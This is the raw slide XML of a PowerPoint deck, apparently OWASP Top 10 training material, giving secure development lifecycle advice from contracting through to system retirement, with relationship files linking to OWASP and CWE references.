          <a:endParaRPr lang="en-US" sz="800" kern="1200" noProof="0" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="355600" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="800" kern="1200" noProof="0" dirty="0"/>
            <a:t>Negotiate all technical requirements including design, security and service level agreements (SLA).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" noProof="0" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="355600" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="800" kern="1200" noProof="0" dirty="0"/>
            <a:t>Adopt templates and checklists, such as </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" sz="800" kern="1200" noProof="0" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>OWASP Secure Software Contract Annex</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" sz="800" kern="1200" noProof="0" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" noProof="0" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1300101" y="1261835"/>
        <a:ext cx="5509597" cy="764959"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{32E4C202-A073-4E81-BC9F-5F3538C94998}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="159318" y="1114487"/>
          <a:ext cx="1140782" cy="10596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en-US" sz="1000" kern="1200" noProof="0" dirty="0"/>
            <a:t>Request for Proposals (RFP) and Contracting</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="211046" y="1166215"/>
        <a:ext cx="1037326" cy="956200"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3552316" y="-18535"/>
          <a:ext cx="1046550" cy="555098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Char char="•"/>
          </a:pPr>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" noProof="0" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="355600">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="800" kern="1200" noProof="0" dirty="0"/>
            <a:t>To ensure applications have a secure design, the following should be performed:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" noProof="0" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="355600">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="800" kern="1200" noProof="0" dirty="0"/>
            <a:t> Negotiate planning and design with the developers and internal shareholders, e.g. security specialists</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" noProof="0" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="355600">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="800" kern="1200" noProof="0" dirty="0"/>
            <a:t> Define a security architecture, controls, and countermeasures according to the protection needs and the planned environmental security level. This should be supported by security specialists.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" noProof="0" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="355600">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="800" kern="1200" noProof="0" dirty="0"/>
            <a:t> Get the application owner to assume remaining risks or to provide additional resources.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" noProof="0" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="355600">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="800" kern="1200" noProof="0" dirty="0"/>
            <a:t> Each sprint, ensure security stories are created for functional requirements, and constraints added for non-functional requirements.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" noProof="0" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1300101" y="2284768"/>
        <a:ext cx="5499892" cy="944374"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="159318" y="2227126"/>
          <a:ext cx="1140782" cy="10596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en-US" sz="1000" kern="1200" noProof="0" dirty="0"/>
            <a:t>Planning and </a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" kern="1200" noProof="0" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" noProof="0" dirty="0"/>
            <a:t>Design</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="211046" y="2278854"/>
        <a:ext cx="1037326" cy="956200"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{992D08B6-B207-435B-A893-D17B49418ACB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3464312" y="1174439"/>
          <a:ext cx="1214908" cy="5545559"/>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None/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="800" kern="1200" dirty="0"/>
            <a:t>To ensure secure operations and changes, the following should be performed:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" noProof="0" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="355600" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="800" kern="1200" dirty="0"/>
            <a:t>Automate the secure setup of the application, interfaces and of all components needed, including required authorizations.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="355600" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="800" kern="1200" dirty="0"/>
            <a:t>Test the technical functions and integration with the IT architecture and coordinate business tests.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="355600" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="800" kern="1200" dirty="0"/>
            <a:t>Create "use" and "abuse" test cases from technical and business perspectives.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="355600" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="800" kern="1200" dirty="0"/>
            <a:t>Manage security tests according to internal processes, the protection needs and the level of security required by the application.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="355600" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="800" kern="1200" dirty="0"/>
            <a:t>Put the application in operation and migrate from previously used applications if needed.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="355600" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="800" kern="1200" dirty="0"/>
            <a:t>Finalize all documentation, including the CMDB and security architecture.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1298987" y="3399072"/>
        <a:ext cx="5486252" cy="1096294"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5CD1B5CA-4D0D-4D4E-B88E-2005B67086FE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="159318" y="3417391"/>
          <a:ext cx="1139668" cy="10596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noProof="0" dirty="0"/>
            <a:t>Deployment, Testing and Rollout</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="211046" y="3469119"/>
        <a:ext cx="1036212" cy="956200"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0BBDD660-3A49-4256-9C52-69675972DDC1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3586309" y="2361994"/>
          <a:ext cx="978562" cy="555098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None/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="800" kern="1200" dirty="0"/>
            <a:t>To ensure secure operations and changes, the following should be performed:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" noProof="0" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="355600" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="800" kern="1200" dirty="0"/>
            <a:t> Operating including the security management for the application (e.g. patch management).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="355600" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="800" kern="1200" dirty="0"/>
            <a:t> Raise the security awareness of users and manage conflicts about usability vs security.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="355600" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="800" kern="1200" dirty="0"/>
            <a:t> Plan and manage changes, e.g. migrate to new versions of the application or other components like OS, middleware and libraries.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="355600" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="800" kern="1200" dirty="0"/>
            <a:t> Update all documentation, including in CMDB and the security architecture, controls, and countermeasures, including any runbooks or project documentation.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1300101" y="4695972"/>
        <a:ext cx="5503211" cy="883024"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D01C5B61-0A7B-4E05-A4E4-BE9BD871660D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="159318" y="4607656"/>
          <a:ext cx="1140782" cy="10596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noProof="0" dirty="0"/>
            <a:t>Operating and Changes</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="211046" y="4659384"/>
        <a:ext cx="1037326" cy="956200"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3651728" y="3474633"/>
          <a:ext cx="847725" cy="5550980"/>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57150" lvl="1" indent="-57150" algn="l" defTabSz="355600" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="800" kern="1200" dirty="0"/>
            <a:t>The process of retiring systems is often overlooked. You should ensure that:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" noProof="0" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="355600" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="800" kern="1200" dirty="0"/>
            <a:t> Any required data is archived. All other data is securely wiped.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="355600" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="800" kern="1200" dirty="0"/>
            <a:t> Securely close down the application, including deleting unused accounts and roles and permissions.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="355600" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="800" kern="1200" dirty="0"/>
            <a:t> Set your application’s state to retired in the CMDB.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1300101" y="5867644"/>
        <a:ext cx="5509597" cy="764959"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{50CC931A-2802-4A28-B17D-4CFEC4144601}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="159318" y="5720295"/>
          <a:ext cx="1140782" cy="105965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rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" noProof="0" dirty="0"/>
            <a:t>Retiring Systems</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="211046" y="5772023"/>
        <a:ext cx="1037326" cy="9562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25.10.2017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10/25/2017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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="110529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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34"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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34"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741469646"/>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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial"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Business</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial"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a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial"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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"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54000" tIns="45720" rIns="54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rPr>
              <a:pPr algn="ctr"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="4A1647"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Gruppieren 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="46590" y="1058047"/>
            <a:ext cx="6049410" cy="390006"/>
            <a:chOff x="46590" y="1058047"/>
            <a:chExt cx="6049410" cy="390006"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="15" name="Group 40"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="46590" y="1058047"/>
              <a:ext cx="6049410" cy="386519"/>
              <a:chOff x="46590" y="1070390"/>
              <a:chExt cx="6049410"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25"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151260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5" r:id="rId4"/>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creativecommons.org/licenses/by-sa/4.0/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://creativecommons.org/licenses/by-sa/4.0/"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www.owasp.org/index.php/Password_Storage_Cheat_Sheet#Leverage_an_adaptive_one-way_function"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3.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hyperlink" Target="https://cynosureprime.blogspot.com.au/2017/08/320-million-hashes-exposed.html" TargetMode="Externa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Password_Storage_Cheat_Sheet"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 Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielmiessler/SecLists/tree/master/Passwor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Password_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/359.html" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/319.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide9.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/Scrypt" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/User_Privacy_Protection_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/312.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/326.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cryptolux.org/index.php/Argon2" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag9.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_weak_Cryptography"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cwe.mitre.org/data/definitions/310.html" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/PBKDF2" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Headers_Project" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://csrc.nist.gov/projects/cryptographic-module-validation-program/validated-modules/search"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Cryptographic_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/202.html" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/Bcrypt"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s://en.wikipedia.org/wiki/Billion_laughs_attack"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en.wikipedia.org/wiki/Document_type_definition" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processin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blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html"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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide12.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)" TargetMode="Externa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hyperlink" Target="https://www.owasp.org/index.php/Testing_for_configuration_management" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisecurity.org/cis-benchmarks/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Cryptographic_Storage" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/2.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/HTTP_Strict_Transport_Security_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://csrc.nist.gov/publications/detail/sp/800-123/fina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Stored_Cross_site_scripting_(OTG-INPVAL-002)" TargetMode="External"/><Relationship 